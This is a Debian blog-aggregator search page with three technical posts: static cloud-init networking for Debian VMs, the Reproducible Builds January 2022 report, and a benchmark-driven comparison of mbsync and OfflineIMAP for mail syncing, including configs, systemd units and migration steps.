Search Results: "ncm"

22 August 2022

Simon Josefsson: Static network config with Debian Cloud images

I self-host some services on virtual machines (VMs), and I m currently using Debian 11.x as the host machine relying on the libvirt infrastructure to manage QEMU/KVM machines. While everything has worked fine for years (including on Debian 10.x), there has always been one issue causing a one-minute delay every time I install a new VM: the default images run a DHCP client that never succeeds in my environment. I never found out a way to disable DHCP in the image, and none of the documented ways through cloud-init that I have tried worked. A couple of days ago, after reading the AlmaLinux wiki I found a solution that works with Debian. The following commands creates a Debian VM with static network configuration without the annoying one-minute DHCP delay. The three essential cloud-init keywords are the NoCloud meta-data parameters dsmode:local, static network-interfaces setting combined with the user-data bootcmd keyword. I m using a Raptor CS Talos II ppc64el machine, so replace the image link with a genericcloud amd64 image if you are using x86.
wget https://cloud.debian.org/images/cloud/bullseye/latest/debian-11-generic-ppc64el.qcow2
cp debian-11-generic-ppc64el.qcow2 foo.qcow2
cat>meta-data
dsmode: local
network-interfaces:  
 iface enp0s1 inet static
 address 192.168.98.14/24
 gateway 192.168.98.12
^D
cat>user-data
#cloud-config
fqdn: foo.mydomain
manage_etc_hosts: true
disable_root: false
ssh_pwauth: false
ssh_authorized_keys:
- ssh-ed25519 AAAA...
timezone: Europe/Stockholm
bootcmd:
- rm -f /run/network/interfaces.d/enp0s1
- ifup enp0s1
^D
virt-install --name foo --import --os-variant debian10 --disk foo.qcow2 --cloud-init meta-data=meta-data,user-data=user-data
Unfortunately virt-install from Debian 11 does not support the cloud-init network-config parameter, so if you want to use a version 2 network configuration with cloud-init (to specify IPv6 addresses, for example) you need to replace the final virt-install command with the following.
cat>network_config_static.cfg
version: 2
 ethernets:
  enp0s1:
   dhcp4: false
   addresses: [ 192.168.98.14/24, fc00::14/7 ]
   gateway4: 192.168.98.12
   gateway6: fc00::12
   nameservers:
    addresses: [ 192.168.98.12, fc00::12 ]
^D
cloud-localds -v -m local --network-config=network_config_static.cfg seed.iso user-data
virt-install --name foo --import --os-variant debian10 --disk foo.qcow2 --disk seed.iso,readonly=on --noreboot
virsh start foo
virsh detach-disk foo vdb --config
virsh console foo
There are still some warnings like the following, but it does not seem to cause any problem: [FAILED] Failed to start Initial cloud-init job (pre-networking). Finally, if you do not want the cloud-init tools installed in your VMs, I found the following set of additional user-data commands helpful. Cloud-init will not be enabled on first boot and a cron job will be added that purges some unwanted packages.
runcmd:
- touch /etc/cloud/cloud-init.disabled
- apt-get update && apt-get dist-upgrade -uy && apt-get autoremove --yes --purge && printf '#!/bin/sh\n  rm /etc/cloud/cloud-init.disabled /etc/cloud/cloud.cfg.d/01_debian_cloud.cfg && apt-get purge --yes cloud-init cloud-guest-utils cloud-initramfs-growroot genisoimage isc-dhcp-client && apt-get autoremove --yes --purge && rm -f /etc/cron.hourly/cloud-cleanup && shutdown --reboot +1;   2>&1   logger -t cloud-cleanup\n' > /etc/cron.hourly/cloud-cleanup && chmod +x /etc/cron.hourly/cloud-cleanup && reboot &
The production script I m using is a bit more complicated, but can be downloaded as vello-vm. Happy hacking!

5 February 2022

Reproducible Builds: Reproducible Builds in January 2022

Welcome to the January 2022 report from the Reproducible Builds project. In our reports, we try outline the most important things that have been happening in the past month. As ever, if you are interested in contributing to the project, please visit our Contribute page on our website.
An interesting blog post was published by Paragon Initiative Enterprises about Gossamer, a proposal for securing the PHP software supply-chain. Utilising code-signing and third-party attestations, Gossamer aims to mitigate the risks within the notorious PHP world via publishing attestations to a transparency log. Their post, titled Solving Open Source Supply Chain Security for the PHP Ecosystem goes into some detail regarding the design, scope and implementation of the system.
This month, the Linux Foundation announced SupplyChainSecurityCon, a conference focused on exploring the security threats affecting the software supply chain, sharing best practices and mitigation tactics. The conference is part of the Linux Foundation s Open Source Summit North America and will take place June 21st 24th 2022, both virtually and in Austin, Texas.

Debian There was a significant progress made in the Debian Linux distribution this month, including:

Other distributions kpcyrd reported on Twitter about the release of version 0.2.0 of pacman-bintrans, an experiment with binary transparency for the Arch Linux package manager, pacman. This new version is now able to query rebuilderd to check if a package was independently reproduced.
In the world of openSUSE, however, Bernhard M. Wiedemann posted his monthly reproducible builds status report.

diffoscope diffoscope is our in-depth and content-aware diff utility. Not only can it locate and diagnose reproducibility issues, it can provide human-readable diffs from many kinds of binary formats. This month, Chris Lamb prepared and uploaded versions 199, 200, 201 and 202 to Debian unstable (that were later backported to Debian bullseye-backports by Mattia Rizzolo), as well as made the following changes to the code itself:
  • New features:
    • First attempt at incremental output support with a timeout. Now passing, for example, --timeout=60 will mean that diffoscope will not recurse into any sub-archives after 60 seconds total execution time has elapsed. Note that this is not a fixed/strict timeout due to implementation issues. [ ][ ]
    • Support both variants of odt2txt, including the one provided by the unoconv package. [ ]
  • Bug fixes:
    • Do not return with a UNIX exit code of 0 if we encounter with a file whose human-readable metadata matches literal file contents. [ ]
    • Don t fail if comparing a nonexistent file with a .pyc file (and add test). [ ][ ]
    • If the debian.deb822 module raises any exception on import, re-raise it as an ImportError. This should fix diffoscope on some Fedora systems. [ ]
    • Even if a Sphinx .inv inventory file is labelled The remainder of this file is compressed using zlib, it might not actually be. In this case, don t traceback and simply return the original content. [ ]
  • Documentation:
    • Improve documentation for the new --timeout option due to a few misconceptions. [ ]
    • Drop reference in the manual page claiming the ability to compare non-existent files on the command-line. (This has not been possible since version 32 which was released in September 2015). [ ]
    • Update X has been modified after NT_GNU_BUILD_ID has been applied messages to, for example, not duplicating the full filename in the diffoscope output. [ ]
  • Codebase improvements:
    • Tidy some control flow. [ ]
    • Correct a recompile typo. [ ]
In addition, Alyssa Ross fixed the comparison of CBFS names that contain spaces [ ], Sergei Trofimovich fixed whitespace for compatibility with version 21.12 of the Black source code reformatter [ ] and Zbigniew J drzejewski-Szmek fixed JSON detection with a new version of file [ ].

Testing framework The Reproducible Builds project runs a significant testing framework at tests.reproducible-builds.org, to check packages and other artifacts for reproducibility. This month, the following changes were made:
  • Fr d ric Pierret (fepitre):
    • Add Debian bookworm to package set creation. [ ]
  • Holger Levsen:
    • Install the po4a package where appropriate, as it is needed for the Reproducible Builds website job [ ]. In addition, also run the i18n.sh and contributors.sh scripts [ ].
    • Correct some grammar in Debian live image build output. [ ]
    • Shell monitor improvements:
      • Only show the offline node section if there are offline nodes. [ ]
      • Colorise offline nodes. [ ]
      • Shrink screen usage. [ ][ ][ ]
    • Node health check improvements:
      • Detect if live package builds encounter incomplete snapshots. [ ][ ][ ]
      • Detect if a host is running with today s date (when it should be set artificially in the future). [ ]
    • Use the devscripts package from bullseye-backports on Debian nodes. [ ]
    • Use the Munin monitoring package bullseye-backports on Debian nodes too. [ ]
    • Update New Year handling, needed to be able to detect real and fake dates. [ ][ ]
    • Improve the error message of the script that powercycles the arm64 architecture nodes hosted by Codethink. [ ]
  • Mattia Rizzolo:
    • Use the new --timeout option added in diffoscope version 202. [ ]
  • Roland Clobus:
    • Update the build scripts now that the hooks for live builds are now maintained upstream in the live-build repository. [ ]
    • Show info lines in Jenkins when reproducible hooks have been active. [ ]
    • Use unique folders for the artifacts from each live Debian version. [ ]
  • Vagrant Cascadian:
    • Switch the Debian armhf architecture nodes to use new proxy. [ ]
    • Misc. node maintenance. [ ].

Upstream patches The Reproducible Builds project attempts to fix as many currently-unreproducible packages as possible. In January, we wrote a large number of such patches, including:

And finally If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:

21 November 2021

Antoine Beaupr : mbsync vs OfflineIMAP

After recovering from my latest email crash (previously, previously), I had to figure out which tool I should be using. I had many options but I figured I would start with a popular one (mbsync). But I also evaluated OfflineIMAP which was resurrected from the Python 2 apocalypse, and because I had used it before, for a long time. Read on for the details.

Benchmark setup All programs were tested against a Dovecot 1:2.3.13+dfsg1-2 server, running Debian bullseye. The client is a Purism 13v4 laptop with a Samsung SSD 970 EVO 1TB NVMe drive. The server is a custom build with a AMD Ryzen 5 2600 CPU, and a RAID-1 array made of two NVMe drives (Intel SSDPEKNW010T8 and WDC WDS100T2B0C). The mail spool I am testing against has almost 400k messages and takes 13GB of disk space:
$ notmuch count --exclude=false
372758
$ du -sh --exclude xapian Maildir
13G Maildir
The baseline we are comparing against is SMD (syncmaildir) which performs the sync in about 7-8 seconds locally (3.5 seconds for each push/pull command) and about 10-12 seconds remotely. Anything close to that or better is good enough. I do not have recent numbers for a SMD full sync baseline, but the setup documentation mentions 20 minutes for a full sync. That was a few years ago, and the spool has obviously grown since then, so that is not a reliable baseline. A baseline for a full sync might be also set with rsync, which copies files at nearly 40MB/s, or 317Mb/s!
anarcat@angela:tmp(main)$ time rsync -a --info=progress2 --exclude xapian  shell.anarc.at:Maildir/ Maildir/
 12,647,814,731 100%   37.85MB/s    0:05:18 (xfr#394981, to-chk=0/395815)    
72.38user 106.10system 5:19.59elapsed 55%CPU (0avgtext+0avgdata 15988maxresident)k
8816inputs+26305112outputs (0major+50953minor)pagefaults 0swaps
That is 5 minutes to transfer the entire spool. Incremental syncs are obviously pretty fast too:
anarcat@angela:tmp(main)$ time rsync -a --info=progress2 --exclude xapian  shell.anarc.at:Maildir/ Maildir/
              0   0%    0.00kB/s    0:00:00 (xfr#0, to-chk=0/395815)    
1.42user 0.81system 0:03.31elapsed 67%CPU (0avgtext+0avgdata 14100maxresident)k
120inputs+0outputs (3major+12709minor)pagefaults 0swaps
As an extra curiosity, here's the performance with tar, pretty similar with rsync, minus incremental which I cannot be bothered to figure out right now:
anarcat@angela:tmp(main)$ time ssh shell.anarc.at tar --exclude xapian -cf - Maildir/   pv -s 13G   tar xf - 
56.68user 58.86system 5:17.08elapsed 36%CPU (0avgtext+0avgdata 8764maxresident)k
0inputs+0outputs (0major+7266minor)pagefaults 0swaps
12,1GiO 0:05:17 [39,0MiB/s] [===================================================================> ] 92%
Interesting that rsync manages to almost beat a plain tar on file transfer, I'm actually surprised by how well it performs here, considering there are many little files to transfer. (But then again, this maybe is exactly where rsync shines: while tar needs to glue all those little files together, rsync can just directly talk to the other side and tell it to do live changes. Something to look at in another article maybe?) Since both ends are NVMe drives, those should easily saturate a gigabit link. And in fact, a backup of the server mail spool achieves much faster transfer rate on disks:
anarcat@marcos:~$ tar fc - Maildir   pv -s 13G > Maildir.tar
15,0GiO 0:01:57 [ 131MiB/s] [===================================] 115%
That's 131Mibyyte per second, vastly faster than the gigabit link. The client has similar performance:
anarcat@angela:~(main)$ tar fc - Maildir   pv -s 17G > Maildir.tar
16,2GiO 0:02:22 [ 116MiB/s] [==================================] 95%
So those disks should be able to saturate a gigabit link, and they are not the bottleneck on fast links. Which begs the question of what is blocking performance of a similar transfer over the gigabit link, but that's another question altogether, because no sync program ever reaches the above performance anyways. Finally, note that when I migrated to SMD, I wrote a small performance comparison that could be interesting here. It show SMD to be faster than OfflineIMAP, but not as much as we see here. In fact, it looks like OfflineIMAP slowed down significantly since then (May 2018), but this could be due to my larger mail spool as well.

mbsync The isync (AKA mbsync) project is written in C and supports syncing Maildir and IMAP folders, with possibly multiple replicas. I haven't tested this but I suspect it might be possible to sync between two IMAP servers as well. It supports partial mirorrs, message flags, full folder support, and "trash" functionality.

Complex configuration file I started with this .mbsyncrc configuration file:
SyncState *
Sync New ReNew Flags
IMAPAccount anarcat
Host imap.anarc.at
User anarcat
PassCmd "pass imap.anarc.at"
SSLType IMAPS
CertificateFile /etc/ssl/certs/ca-certificates.crt
IMAPStore anarcat-remote
Account anarcat
MaildirStore anarcat-local
# Maildir/top/sub/sub
#SubFolders Verbatim
# Maildir/.top.sub.sub
SubFolders Maildir++
# Maildir/top/.sub/.sub
# SubFolders legacy
# The trailing "/" is important
#Path ~/Maildir-mbsync/
Inbox ~/Maildir-mbsync/
Channel anarcat
# AKA Far, convert when all clients are 1.4+
Master :anarcat-remote:
# AKA Near
Slave :anarcat-local:
# Exclude everything under the internal [Gmail] folder, except the interesting folders
#Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail"
# Or include everything
Patterns *
# Automatically create missing mailboxes, both locally and on the server
#Create Both
Create slave
# Sync the movement of messages between folders and deletions, add after making sure the sync works
#Expunge Both
Long gone are the days where I would spend a long time reading a manual page to figure out the meaning of every option. If that's your thing, you might like this one. But I'm more of a "EXAMPLES section" kind of person now, and I somehow couldn't find a sample file on the website. I started from the Arch wiki one but it's actually not great because it's made for Gmail (which is not a usual Dovecot server). So a sample config file in the manpage would be a great addition. Thankfully, the Debian packages ships one in /usr/share/doc/isync/examples/mbsyncrc.sample but I only found that after I wrote my configuration. It was still useful and I recommend people take a look if they want to understand the syntax. Also, that syntax is a little overly complicated. For example, Far needs colons, like:
Far :anarcat-remote:
Why? That seems just too complicated. I also found that sections are not clearly identified: IMAPAccount and Channel mark section beginnings, for example, which is not at all obvious until you learn about mbsync's internals. There are also weird ordering issues: the SyncState option needs to be before IMAPAccount, presumably because it's global. Using a more standard format like .INI or TOML could improve that situation.

Stellar performance A transfer of the entire mail spool takes 56 minutes and 6 seconds, which is impressive. It's not quite "line rate": the resulting mail spool was 12GB (which is a problem, see below), which turns out to be about 29Mbit/s and therefore not maxing the gigabit link, and an order of magnitude slower than rsync. The incremental runs are roughly 2 seconds, which is even more impressive, as that's actually faster than rsync:
===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        2.015       0.052       1.930       2.029       2.105       
user        0.660       0.040       0.592       0.661       0.722       
sys         0.338       0.033       0.268       0.341       0.387    
Those tests were performed with isync 1.3.0-2.2 on Debian bullseye. Tests with a newer isync release originally failed because of a corrupted message that triggered bug 999804 (see below). Running 1.4.3 under valgrind works around the bug, but adds a 50% performance cost, the full sync running in 1h35m. Once the upstream patch is applied, performance with 1.4.3 is fairly similar, considering that the new sync included the register folder with 4000 messages:
120.74user 213.19system 59:47.69elapsed 9%CPU (0avgtext+0avgdata 105420maxresident)k
29128inputs+28284376outputs (0major+45711minor)pagefaults 0swaps
That is ~13GB in ~60 minutes, which gives us 28.3Mbps. Incrementals are also pretty similar to 1.3.x, again considering the double-connect cost:
===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        2.500       0.087       2.340       2.491       2.629       
user        0.718       0.037       0.679       0.711       0.793       
sys         0.322       0.024       0.284       0.320       0.365
Those tests were all done on a Gigabit link, but what happens on a slower link? My server uplink is slow: 25 Mbps down, 6 Mbps up. There mbsync is worse than the SMD baseline:
===> multitime results
1: mbsync -a
Mean        Std.Dev.    Min         Median      Max
real        31.531      0.724       30.764      31.271      33.100      
user        1.858       0.125       1.721       1.818       2.131       
sys         0.610       0.063       0.506       0.600       0.695       
That's 30 seconds for a sync, which is an order of magnitude slower than SMD.

Great user interface Compared to OfflineIMAP and (ahem) SMD, the mbsync UI is kind of neat:
anarcat@angela:~(main)$ mbsync -a
Notice: Master/Slave are deprecated; use Far/Near instead.
C: 1/2  B: 204/205  F: +0/0 *0/0 #0/0  N: +1/200 *0/0 #0/0
(Note that nice switch away from slavery-related terms too.) The display is minimal, and yet informative. It's not obvious what does mean at first glance, but the manpage is useful at least for clarifying that:
This represents the cumulative progress over channels, boxes, and messages affected on the far and near side, respectively. The message counts represent added messages, messages with updated flags, and trashed messages, respectively. No attempt is made to calculate the totals in advance, so they grow over time as more information is gathered. (Emphasis mine).
In other words:
  • C 2/2: channels done/total (2 done out of 2)
  • B 204/205: mailboxes done/total (204 out of 205)
  • F: changes on the far side
  • N: +10/200 *0/0 #0/0: changes on the "near" side:
    • +10/200: 10 out of 200 messages downloaded
    • *0/0: no flag changed
    • #0/0: no message deleted
You get used to it, in a good way. It does not, unfortunately, show up when you run it in systemd, which is a bit annoying as I like to see a summary mail traffic in the logs.

Interoperability issue In my notmuch setup, I have bound key S to "mark spam", which basically assigns the tag spam to the message and removes a bunch of others. Then I have a notmuch-purge script which moves that message to the spam folder, for training purposes. It basically does this:
notmuch search --output=files --format=text0 "$search_spam" \
      xargs -r -0 mv -t "$HOME/Maildir/$ PREFIX junk/cur/"
This method, which worked fine in SMD (and also OfflineIMAP) created this error on sync:
Maildir error: duplicate UID 37578.
And indeed, there are now two messages with that UID in the mailbox:
anarcat@angela:~(main)$ find Maildir/.junk/ -name '*U=37578*'
Maildir/.junk/cur/1637427889.134334_2.angela,U=37578:2,S
Maildir/.junk/cur/1637348602.2492889_221804.angela,U=37578:2,S
This is actually a known limitation or, as mbsync(1) calls it, a "RECOMMENDATION":
When using the more efficient default UID mapping scheme, it is important that the MUA renames files when moving them between Maildir fold ers. Mutt always does that, while mu4e needs to be configured to do it:
(setq mu4e-change-filenames-when-moving t)
So it seems I would need to fix my script. It's unclear how the paths should be renamed, which is unfortunate, because I would need to change my script to adapt to mbsync, but I can't tell how just from reading the above. (A manual fix is actually to rename the file to remove the U= field: mbsync will generate a new one and then sync correctly.) Fortunately, someone else already fixed that issue: afew, a notmuch tagging script (much puns, such hurt), has a move mode that can rename files correctly, specifically designed to deal with mbsync. I had already been told about afew, but it's one more reason to standardize my notmuch hooks on that project, it looks like. Update: I have tried to use afew and found it has significant performance issues. It also has a completely different paradigm to what I am used to: it assumes all incoming mail has a new and lays its own tags on top of that (inbox, sent, etc). It can only move files from one folder at a time (see this bug) which breaks my spam training workflow. In general, I sync my tags into folders (e.g. ham, spam, sent) and message flags (e.g. inbox is F, unread is "not S", etc), and afew is not well suited for this (although there are hacks that try to fix this). I have worked hard to make my tagging scripts idempotent, and it's something afew doesn't currently have. Still, it would be better to have that code in Python than bash, so maybe I should consider my options here.

Stability issues The newer release in Debian bookworm (currently at 1.4.3) has stability issues on full sync. I filed bug 999804 in Debian about this, which lead to a thread on the upstream mailing list. I have found at least three distinct crashes that could be double-free bugs "which might be exploitable in the worst case", not a reassuring prospect. The thing is: mbsync is really fast, but the downside of that is that it's written in C, and with that comes a whole set of security issues. The Debian security tracker has only three CVEs on isync, but the above issues show there could be many more. Reading the source code certainly did not make me very comfortable with trusting it with untrusted data. I considered sandboxing it with systemd (below) but having systemd run as a --user process makes that difficult. I also considered using an apparmor profile but that is not trivial because we need to allow SSH and only some parts of it... Thankfully, upstream has been diligent at addressing the issues I have found. They provided a patch within a few days which did fix the sync issues. Update: upstream actually took the issue very seriously. They not only got CVE-2021-44143 assigned for my bug report, they also audited the code and found several more issues collectively identified as CVE-2021-3657, which actually also affect 1.3 (ie. Debian 11/bullseye/stable). Somehow my corpus doesn't trigger that issue, but it was still considered serious enough to warrant a CVE. So one the one hand: excellent response from upstream; but on the other hand: how many more of those could there be in there?

Automation with systemd The Arch wiki has instructions on how to setup mbsync as a systemd service. It suggests using the --verbose (-V) flag which is a little intense here, as it outputs 1444 lines of messages. I have used the following .service file:
[Unit]
Description=Mailbox synchronization service
ConditionHost=!marcos
Wants=network-online.target
After=network-online.target
Before=notmuch-new.service
[Service]
Type=oneshot
ExecStart=/usr/bin/mbsync -a
Nice=10
IOSchedulingClass=idle
NoNewPrivileges=true
[Install]
WantedBy=default.target
And the following .timer:
[Unit]
Description=Mailbox synchronization timer
ConditionHost=!marcos
[Timer]
OnBootSec=2m
OnUnitActiveSec=5m
Unit=mbsync.service
[Install]
WantedBy=timers.target
Note that we trigger notmuch through systemd, with the Before and also by adding mbsync.service to the notmuch-new.service file:
[Unit]
Description=notmuch new
After=mbsync.service
[Service]
Type=oneshot
Nice=10
ExecStart=/usr/bin/notmuch new
[Install]
WantedBy=mbsync.service
An improvement over polling repeatedly with a .timer would be to wake up only on IMAP notify, but neither imapnotify nor goimapnotify seem to be packaged in Debian. It would also not cover for the "sent folder" use case, where we need to wake up on local changes.

Password-less setup The sample file suggests this should work:
IMAPStore remote
Tunnel "ssh -q host.remote.com /usr/sbin/imapd"
Add BatchMode, restrict to IdentitiesOnly, provide a password-less key just for this, add compression (-C), find the Dovecot imap binary, and you get this:
IMAPAccount anarcat-tunnel
Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C anarcat@imap.anarc.at /usr/lib/dovecot/imap"
And it actually seems to work:
$ mbsync -a
Notice: Master/Slave are deprecated; use Far/Near instead.
C: 0/2  B: 0/1  F: +0/0 *0/0 #0/0  N: +0/0 *0/0 #0/0imap(anarcat): Error: net_connect_unix(/run/dovecot/stats-writer) failed: Permission denied
C: 2/2  B: 205/205  F: +0/0 *0/0 #0/0  N: +1/1 *3/3 #0/0imap(anarcat)<1611280><90uUOuyElmEQlhgAFjQyWQ>: Info: Logged out in=10808 out=15396642 deleted=0 expunged=0 trashed=0 hdr_count=0 hdr_bytes=0 body_count=1 body_bytes=8087
It's a bit noisy, however. dovecot/imap doesn't have a "usage" to speak of, but even the source code doesn't hint at a way to disable that Error message, so that's unfortunate. That socket is owned by root:dovecot so presumably Dovecot runs the imap process as $user:dovecot, which we can't do here. Oh well? Interestingly, the SSH setup is not faster than IMAP. With IMAP:
===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        2.367       0.065       2.220       2.376       2.458       
user        0.793       0.047       0.731       0.776       0.871       
sys         0.426       0.040       0.364       0.434       0.476
With SSH:
===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        2.515       0.088       2.274       2.532       2.594       
user        0.753       0.043       0.645       0.766       0.804       
sys         0.328       0.045       0.212       0.340       0.393
Basically: 200ms slower. Tolerable.

Migrating from SMD The above was how I migrated to mbsync on my first workstation. The work on the second one was more streamlined, especially since the corruption on mailboxes was fixed:
  1. install isync, with the patch:
    dpkg -i isync_1.4.3-1.1~_amd64.deb
    
  2. copy all files over from previous workstation to avoid a full resync (optional):
    rsync -a --info=progress2 angela:Maildir/ Maildir-mbsync/
    
  3. rename all files to match new hostname (optional):
    find Maildir-mbsync/ -type f -name '*.angela,*' -print0    rename -0 's/\.angela,/\.curie,/'
    
  4. trash the notmuch database (optional):
    rm -rf Maildir-mbsync/.notmuch/xapian/
    
  5. disable all smd and notmuch services:
    systemctl --user --now disable smd-pull.service smd-pull.timer smd-push.service smd-push.timer notmuch-new.service notmuch-new.timer
    
  6. do one last sync with smd:
    smd-pull --show-tags ; smd-push --show-tags ; notmuch new ; notmuch-sync-flagged -v
    
  7. backup notmuch on the client and server:
    notmuch dump   pv > notmuch.dump
    
  8. backup the maildir on the client and server:
    cp -al Maildir Maildir-bak
    
  9. create the SSH key:
    ssh-keygen -t ed25519 -f .ssh/id_ed25519_mbsync
    cat .ssh/id_ed25519_mbsync.pub
    
  10. add to .ssh/authorized_keys on the server, like this: command="/usr/lib/dovecot/imap",restrict ssh-ed25519 AAAAC...
  11. move old files aside, if present:
    mv Maildir Maildir-smd
    
  12. move new files in place (CRITICAL SECTION BEGINS!):
    mv Maildir-mbsync Maildir
    
  13. run a test sync, only pulling changes: mbsync --create-near --remove-none --expunge-none --noop anarcat-register
  14. if that works well, try with all mailboxes: mbsync --create-near --remove-none --expunge-none --noop -a
  15. if that works well, try again with a full sync: mbsync register mbsync -a
  16. reindex and restore the notmuch database, this should take ~25 minutes:
    notmuch new
    pv notmuch.dump   notmuch restore
    
  17. enable the systemd services and retire the smd-* services: systemctl --user enable mbsync.timer notmuch-new.service systemctl --user start mbsync.timer rm ~/.config/systemd/user/smd* systemctl daemon-reload
During the migration, notmuch helpfully told me the full list of those lost messages:
[...]
Warning: cannot apply tags to missing message: CAN6gO7_QgCaiDFvpG3AXHi6fW12qaN286+2a7ERQ2CQtzjSEPw@mail.gmail.com
Warning: cannot apply tags to missing message: CAPTU9Wmp0yAmaxO+qo8CegzRQZhCP853TWQ_Ne-YF94MDUZ+Dw@mail.gmail.com
Warning: cannot apply tags to missing message: F5086003-2917-4659-B7D2-66C62FCD4128@gmail.com
[...]
Warning: cannot apply tags to missing message: mailman.2.1316793601.53477.sage-members@mailman.sage.org
Warning: cannot apply tags to missing message: mailman.7.1317646801.26891.outages-discussion@outages.org
Warning: cannot apply tags to missing message: notmuch-sha1-000458df6e48d4857187a000d643ac971deeef47
Warning: cannot apply tags to missing message: notmuch-sha1-0079d8e0c3340e6f88c66f4c49fca758ea71d06d
Warning: cannot apply tags to missing message: notmuch-sha1-0194baa4cfb6d39bc9e4d8c049adaccaa777467d
Warning: cannot apply tags to missing message: notmuch-sha1-02aede494fc3f9e9f060cfd7c044d6d724ad287c
Warning: cannot apply tags to missing message: notmuch-sha1-06606c625d3b3445420e737afd9a245ae66e5562
Warning: cannot apply tags to missing message: notmuch-sha1-0747b020f7551415b9bf5059c58e0a637ba53b13
[...]
As detailed in the crash report, all of those were actually innocuous and could be ignored. Also note that we completely trash the notmuch database because it's actually faster to reindex from scratch than let notmuch slowly figure out that all mails are new and all the old mails are gone. The fresh indexing took:
nov 19 15:08:54 angela notmuch[2521117]: Processed 384679 total files in 23m 41s (270 files/sec.).
nov 19 15:08:54 angela notmuch[2521117]: Added 372610 new messages to the database.
While a reindexing on top of an existing database was going twice as slow, at about 120 files/sec.

Current config file Putting it all together, I ended up with the following configuration file:
SyncState *
Sync All
# IMAP side, AKA "Far"
IMAPAccount anarcat-imap
Host imap.anarc.at
User anarcat
PassCmd "pass imap.anarc.at"
SSLType IMAPS
CertificateFile /etc/ssl/certs/ca-certificates.crt
IMAPAccount anarcat-tunnel
Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C anarcat@imap.anarc.at /usr/lib/dovecot/imap"
IMAPStore anarcat-remote
Account anarcat-tunnel
# Maildir side, AKA "Near"
MaildirStore anarcat-local
# Maildir/top/sub/sub
#SubFolders Verbatim
# Maildir/.top.sub.sub
SubFolders Maildir++
# Maildir/top/.sub/.sub
# SubFolders legacy
# The trailing "/" is important
#Path ~/Maildir-mbsync/
Inbox ~/Maildir/
# what binds Maildir and IMAP
Channel anarcat
Far :anarcat-remote:
Near :anarcat-local:
# Exclude everything under the internal [Gmail] folder, except the interesting folders
#Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail"
# Or include everything
#Patterns *
Patterns * !register  !.register
# Automatically create missing mailboxes, both locally and on the server
Create Both
#Create Near
# Sync the movement of messages between folders and deletions, add after making sure the sync works
Expunge Both
# Propagate mailbox deletion
Remove both
IMAPAccount anarcat-register-imap
Host imap.anarc.at
User register
PassCmd "pass imap.anarc.at-register"
SSLType IMAPS
CertificateFile /etc/ssl/certs/ca-certificates.crt
IMAPAccount anarcat-register-tunnel
Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C register@imap.anarc.at /usr/lib/dovecot/imap"
IMAPStore anarcat-register-remote
Account anarcat-register-tunnel
MaildirStore anarcat-register-local
SubFolders Maildir++
Inbox ~/Maildir/.register/
Channel anarcat-register
Far :anarcat-register-remote:
Near :anarcat-register-local:
Create Both
Expunge Both
Remove both
Note that it may be out of sync with my live (and private) configuration file, as I do not publish my "dotfiles" repository publicly for security reasons.

OfflineIMAP I've used OfflineIMAP for a long time before switching to SMD. I don't exactly remember why or when I started using it, but I do remember it became painfully slow as I started using notmuch, and would sometimes crash mysteriously. It's been a while, so my memory is hazy on that. It also kind of died in a fire when Python 2 stop being maintained. The main author moved on to a different project, imapfw which could serve as a framework to build IMAP clients, but never seemed to implement all of the OfflineIMAP features and certainly not configuration file compatibility. Thankfully, a new team of volunteers ported OfflineIMAP to Python 3 and we can now test that new version to see if it is an improvement over mbsync.

Crash on full sync The first thing that happened on a full sync is this crash:
Copy message from RemoteAnarcat:junk:
 ERROR: Copying message 30624 [acc: Anarcat]
  decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Thread 'Copy message from RemoteAnarcat:junk' terminated with exception:
Traceback (most recent call last):
  File "/usr/share/offlineimap3/offlineimap/imaputil.py", line 406, in utf7m_decode
    for c in binary.decode():
AttributeError: 'memoryview' object has no attribute 'decode'
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
  File "/usr/share/offlineimap3/offlineimap/threadutil.py", line 146, in run
    Thread.run(self)
  File "/usr/lib/python3.9/threading.py", line 892, in run
    self._target(*self._args, **self._kwargs)
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 802, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 342, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 908, in _fetch_from_imap
    ndata1 = self.parser['8bit-RFC'].parsebytes(data[0][1])
  File "/usr/lib/python3.9/email/parser.py", line 123, in parsebytes
    return self.parser.parsestr(text, headersonly)
  File "/usr/lib/python3.9/email/parser.py", line 67, in parsestr
    return self.parse(StringIO(text), headersonly=headersonly)
  File "/usr/lib/python3.9/email/parser.py", line 56, in parse
    feedparser.feed(data)
  File "/usr/lib/python3.9/email/feedparser.py", line 176, in feed
    self._call_parse()
  File "/usr/lib/python3.9/email/feedparser.py", line 180, in _call_parse
    self._parse()
  File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 298, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 256, in _parsegen
    if self._cur.get_content_type() == 'message/delivery-status':
  File "/usr/lib/python3.9/email/message.py", line 578, in get_content_type
    value = self.get('content-type', missing)
  File "/usr/lib/python3.9/email/message.py", line 471, in get
    return self.policy.header_fetch_parse(k, v)
  File "/usr/lib/python3.9/email/policy.py", line 163, in header_fetch_parse
    return self.header_factory(name, value)
  File "/usr/lib/python3.9/email/headerregistry.py", line 601, in __call__
    return self[name](name, value)
